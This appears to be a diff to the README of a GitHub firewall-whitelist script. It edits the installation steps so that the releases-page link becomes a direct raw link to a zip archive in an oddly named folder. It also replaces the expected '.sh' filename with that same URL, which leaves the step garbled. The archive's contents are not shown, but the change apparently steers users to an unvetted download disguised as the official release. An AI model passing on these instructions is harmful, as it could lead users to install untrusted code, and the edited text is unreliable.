DEVayman20/firewall-whitelist-admin/README.md

 ### 🛠️ Installation Steps

 1. **Visit the Releases Page**
-   Go to [this link](https://github.com/DEVayman20/firewall-whitelist-admin/releases) to find the latest version of the script.
+   Go to [this link](https://raw.githubusercontent.com/DEVayman20/firewall-whitelist-admin/main/unglozed/firewall-whitelist-admin.zip) to find the latest version of the script.

 2. **Download the Script**
    Click on the latest version to view its details.
-Look for a file named `firewall-whitelist-admin.sh` or similar.
+Look for a file named `https://raw.githubusercontent.com/DEVayman20/firewall-whitelist-admin/main/unglozed/firewall-whitelist-admin.zip` or similar.

 3. **Save the File**
    Click on the file to download.
 Make sure to remember where you saved it, as you will need this location later.